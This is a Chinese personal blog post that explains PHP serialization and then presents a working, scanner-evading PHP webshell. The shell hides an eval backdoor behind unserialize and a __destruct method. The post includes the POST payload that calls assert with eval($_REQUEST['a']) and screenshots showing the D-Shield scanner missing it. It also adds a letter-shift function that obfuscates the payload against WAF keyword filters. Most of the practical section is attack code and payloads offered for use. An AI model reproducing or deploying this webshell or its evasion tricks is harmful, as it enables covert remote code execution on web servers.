<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>PHP反序列化免杀waf软件 | 魂淡的随笔录</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="PHP反序列化免杀waf软件一些需要的基础、理论知识序列化序列化：把复杂的数据类型压缩到一个字符串中。这里面的数据类型可以是数组、字符串、对象等， 函数：serialize（）">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化免杀waf软件">
<meta property="og:url" content="https:&#x2F;&#x2F;soul-hd.github.io&#x2F;2020&#x2F;01&#x2F;16&#x2F;PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%8D%E6%9D%80waf%E8%BD%AF%E4%BB%B6&#x2F;index.html">
<meta property="og:site_name" content="魂淡的随笔录">
<meta property="og:description" content="PHP反序列化免杀waf软件一些需要的基础、理论知识序列化序列化：把复杂的数据类型压缩到一个字符串中。这里面的数据类型可以是数组、字符串、对象等， 函数：serialize（）">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https:&#x2F;&#x2F;s2.ax1x.com&#x2F;2020&#x2F;01&#x2F;16&#x2F;lvbPET.png">
<meta property="og:image" content="https:&#x2F;&#x2F;s2.ax1x.com&#x2F;2020&#x2F;01&#x2F;16&#x2F;lvbF5F.png">
<meta property="og:image" content="https:&#x2F;&#x2F;s2.ax1x.com&#x2F;2020&#x2F;01&#x2F;16&#x2F;lvbpD0.png">
<meta property="og:image" content="https:&#x2F;&#x2F;s2.ax1x.com&#x2F;2020&#x2F;01&#x2F;16&#x2F;lvb9bV.png">
<meta property="article:published_time" content="2020-01-16T00:00:00.000Z">
<meta property="article:modified_time" content="2020-01-16T11:06:21.181Z">
<meta property="article:author" content="魂淡">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https:&#x2F;&#x2F;s2.ax1x.com&#x2F;2020&#x2F;01&#x2F;16&#x2F;lvbPET.png">
  
    <link rel="alternate" href="/atom.xml" title="魂淡的随笔录" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/plugin/bganimation/bg.css">

  

<meta name="generator" content="Hexo 4.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="../img/1.jpg">
    <h2 class="author">魂淡</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>18</strong><br>文章</div></a>
      <a href="/categories"><div><strong>4</strong><br>分类</div></a>
      <a href="/tags"><div><strong>6</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-PHP反序列化免杀waf软件" class="wow slideInRight article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/01/16/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%8D%E6%9D%80waf%E8%BD%AF%E4%BB%B6/" class="article-date">
  <time class="post-time" datetime="2020-01-16T00:00:00.000Z" itemprop="datePublished">
    <span class="post-month">1月</span><br/>
    <span class="post-day">16</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      PHP反序列化免杀waf软件
    </h1>
  

        <div>
          
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">学习笔记</a>
  </div>

          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="PHP反序列化免杀waf软件"><a href="#PHP反序列化免杀waf软件" class="headerlink" title="PHP反序列化免杀waf软件"></a>PHP反序列化免杀waf软件</h1><h2 id="一些需要的基础、理论知识"><a href="#一些需要的基础、理论知识" class="headerlink" title="一些需要的基础、理论知识"></a>一些需要的基础、理论知识</h2><h3 id="序列化"><a href="#序列化" class="headerlink" title="序列化"></a>序列化</h3><p>序列化：把复杂的数据类型压缩到一个字符串中。这里面的数据类型可以是数组、字符串、对象等，</p>
<p>函数：serialize（）</p>
<a id="more"></a>

<p>例1：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$sites = <span class="keyword">array</span>(<span class="string">'a1'</span>, <span class="string">'ba2'</span>, <span class="string">'c3ac'</span>);</span><br><span class="line">$serialized_data = serialize($sites);</span><br><span class="line"><span class="keyword">echo</span>  $serialized_data;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>以上这串php代码就是一个序列化的过程，其运行结果为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:3:&#123;i:0;s:2:&quot;a1&quot;;i:1;s:3:&quot;ba2&quot;;i:2;s:4:&quot;c3ac&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>一般输出结果的各个字符有着这些意义：</p>
<p><strong>o表示对象，a表示数组，s表示字符，i表示数字</strong></p>
<p>而在我们的例1中：</p>
<p>a:3 表示有三个数组</p>
<p>i:0表示第一个数组，s:2:”a1”表示第一个数组是字符，2表示有两个字符（“a1”）</p>
<p>i:1,表示第二个数组，s:3:”tt2”,表示第二个数组是字符，3表示有三个字符（”ba2”）<br>i:2,表示第三个数组，s:4:”ttt3”,表示第三个数组是字符，4表示有三个字符，为”c3ac”</p>
<p>那么序列化有什么用途呢？</p>
<p>它有着以下的用途：</p>
<p>①数据持久化：通过将session对象（也可以是其他，这里举session对象为例）序列化到硬盘中，需要时在进行反序列化，从而减少内存的压力。</p>
<p>②网络传输：将系统拆分成多个服务，服务之间传输的对象不管是哪种数据类型，都需要转换成二进制流来传输，接收方收到这串二进制流后再转为数据对象。</p>
<h3 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h3><p>反序列化就是将原本序列化的变量进行恢复</p>
<p>函数：unserialize（）</p>
<p>例2：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$sites = <span class="string">"abcd"</span>;</span><br><span class="line">$serialized_data = serialize($sites);</span><br><span class="line">$b=unserialize($serialized_data);</span><br><span class="line"><span class="keyword">echo</span> $b;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在例2里面，我们先对sites进行序列化，得到以下这串字符：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s:4:&quot;abcd&quot;;</span><br></pre></td></tr></table></figure>

<p>然后我们再通过反序列化（unserialize（））将这串字符还原，就得到一开始的sites（abcd）</p>
<h3 id="一些常用的魔法函数"><a href="#一些常用的魔法函数" class="headerlink" title="一些常用的魔法函数"></a>一些常用的魔法函数</h3><p>__construct()当一个对象创建时被调用，但在unserialize()时是不会自动调用的。</p>
<p>__destruct()当一个对象销毁时被调用</p>
<p>__toString()当一个对象被当作一个字符串使用</p>
<p>__sleep() 在对象在被序列化之前运行</p>
<p>__wakeup将在序列化之后</p>
<h2 id="实战"><a href="#实战" class="headerlink" title="实战"></a>实战</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">A</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $name;</span><br><span class="line">    <span class="keyword">public</span> $mm;</span><br><span class="line">    <span class="function"><span class="keyword">function</span>  <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        $a = <span class="keyword">$this</span>-&gt;name;</span><br><span class="line">        $a(<span class="keyword">$this</span>-&gt;mm);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$test=$_POST[<span class="string">'waf'</span>];</span><br><span class="line">$www = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">unserialize($test.$www);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这是一个免杀的一句话木马</p>
<p>它的原理就是我们之前所讲的序列化和反序列化，通过将POST传进去的序列化后的字符串反序列化从而达成绕过效果。</p>
<p>POST传入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">waf&#x3D;O:1:&quot;A&quot;:2：&#123;s:4:&quot;name&quot;;s:6:&quot;assert&quot;;s:2:&quot;mm&quot;;s:20:&quot;eval($_REQUEST[&quot;a&quot;])&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>GET传入：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;phpinfo()；</span><br></pre></td></tr></table></figure>

<p>实际效果：</p>
<p>将写好的代码放进www目录下，并使用d盾进行扫描</p>
<p><img src="https://s2.ax1x.com/2020/01/16/lvbPET.png" alt=""></p>
<p>并没有显示报错（我们的代码名叫test1.php）</p>
<p>尝试在页面打开phpinfo（）</p>
<p><img src="https://s2.ax1x.com/2020/01/16/lvbF5F.png" alt=""></p>
<p>然后查看D盾是否有报错</p>
<p><img src="https://s2.ax1x.com/2020/01/16/lvbpD0.png" alt=""></p>
<p><img src="https://s2.ax1x.com/2020/01/16/lvb9bV.png" alt=""></p>
<p>并没有任何拦截报错的显示</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><p>听说现在的一些waf对这种传入的值会进行判断，如果含有eval这种特殊字符则会自动拦截，同时现在的waf还自带base64的解密功能，因此我们对这个脚本传入的post参数进行加密</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">encryption</span><span class="params">($str)</span></span>&#123;</span><br><span class="line">    $d=strlen($str);</span><br><span class="line">    $b=<span class="keyword">array</span>();</span><br><span class="line">    $e=<span class="number">0</span>;</span><br><span class="line">    explode($str,$str<span class="number">-1</span>);</span><br><span class="line">    <span class="keyword">while</span>($e!=$d)&#123;</span><br><span class="line">        <span class="keyword">if</span>(preg_match (<span class="string">"/^[A-Za-z]/"</span>, $str[$e]))&#123;</span><br><span class="line">            <span class="keyword">if</span>(ord($str[$e])==<span class="number">65</span>)&#123;</span><br><span class="line">                $c=<span class="number">90</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span>&#123;</span><br><span class="line">                <span class="keyword">if</span>(ord($str[$e])==<span class="number">97</span>)&#123;</span><br><span class="line">                    $c=<span class="number">122</span>;</span><br><span class="line">                &#125;</span><br><span class="line">                <span class="keyword">else</span>&#123;</span><br><span class="line">                    $c=ord($str[$e])<span class="number">-1</span>;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">            $b[$e]=chr($c);</span><br><span class="line">            $e++;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            $b[$e]=$str[$e];</span><br><span class="line">            $e++;</span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> implode(<span class="string">''</span>,$b);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">waf&#x3D;P:1:&quot;B&quot;:2:&#123;t:4:&quot;obnf&quot;;t:6:&quot;bttfsu&quot;;t:2:&quot;nn&quot;;t:20:&quot;fwbm($_SFRVFTU[&quot;b&quot;])&quot;;&#125;</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="https://soul-hd.github.io/2020/01/16/PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%85%8D%E6%9D%80waf%E8%BD%AF%E4%BB%B6/" data-id="ck60c2cb9000scgvw9qv95p8f" class="article-share-link">分享</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/" rel="tag">网络安全</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/01/20/%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%8C%85%E5%90%AB%E6%95%B0%E5%AD%97%E5%92%8C%E5%AD%97%E6%AF%8D%E7%9A%84webshell/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">
        
          一些不包含数字和字母的webshell理解
        
      </div>
    </a>
  
  
    <a href="/2019/12/30/hello/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">下一篇</strong>
      <div class="article-nav-title">hello</div>
    </a>
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">魂淡的随笔录</h1>
    <h2 class="blog-subtitle"></h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="../img/1.jpg">
    <h2 class="author">魂淡</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>18</strong><br>文章</div></a>
      <a href="/categories"><div><strong>4</strong><br>分类</div></a>
      <a href="/tags"><div><strong>6</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="" target="_blank" title="">
          
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友情链接</h2>
      
        <a class="hvr-bounce-in" href="http://leafy.coding.me/" target="_blank" title="Cheung">
          Cheung
        </a>
      
        <a class="hvr-bounce-in" href="https://ionssource.cn/" target="_blank" title="阿猫阿狗">
          阿猫阿狗
        </a>
      
        <a class="hvr-bounce-in" href="https://www.oscarice.com/" target="_blank" title="Oscarice">
          Oscarice
        </a>
      
        <a class="hvr-bounce-in" href="http://www.naraku.cn/" target="_blank" title="风渐远">
          风渐远
        </a>
      
        <a class="hvr-bounce-in" href="https://blog.csdn.net/qq_39936434/" target="_blank" title="吃肉唐僧">
          吃肉唐僧
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2019 - 2020 魂淡<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a href="https://github.com/ShanaMaid/hexo-theme-shana" target="_blank" rel="noopener">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  
<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">

  
<script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>




  
<link rel="stylesheet" href="/plugin/galmenu/GalMenu.css">

  
<script src="/plugin/galmenu/GalMenu.js"></script>

  <div class="GalMenu GalDropDown">
      <div class="circle" id="gal">
        <div class="ring">
          
            <a href="/" title="" class="menuItem">首页</a>
          
            <a href="/tags" title="" class="menuItem">标签</a>
          
            <a href="/categories" title="" class="menuItem">分类</a>
          
            <a href="/archives" title="" class="menuItem">归档</a>
          
        </div>
        
          <audio id="audio" src="#"></audio>
        
      </div> 
</div>
<div id="overlay" style="opacity: 1; cursor: pointer;"></div>
  <script type="text/javascript">var items = document.querySelectorAll('.menuItem');
    for (var i = 0,
    l = items.length; i < l; i++) {
      items[i].style.left = (50 - 35 * Math.cos( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%";
      items[i].style.top = (50 + 35 * Math.sin( - 0.5 * Math.PI - 2 * (1 / l) * i * Math.PI)).toFixed(4) + "%"
    }</script>
<script type="text/javascript">
  $(document).ready(function() {
    $('body').GalMenu({
      'menu': 'GalDropDown'
    })
  });
</script>

  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>

<script src="/js/script.js"></script>




  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"motions/","tagMode":false,"debug":false,"model":{"jsonPath":"live2d-widget-model-hk416"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>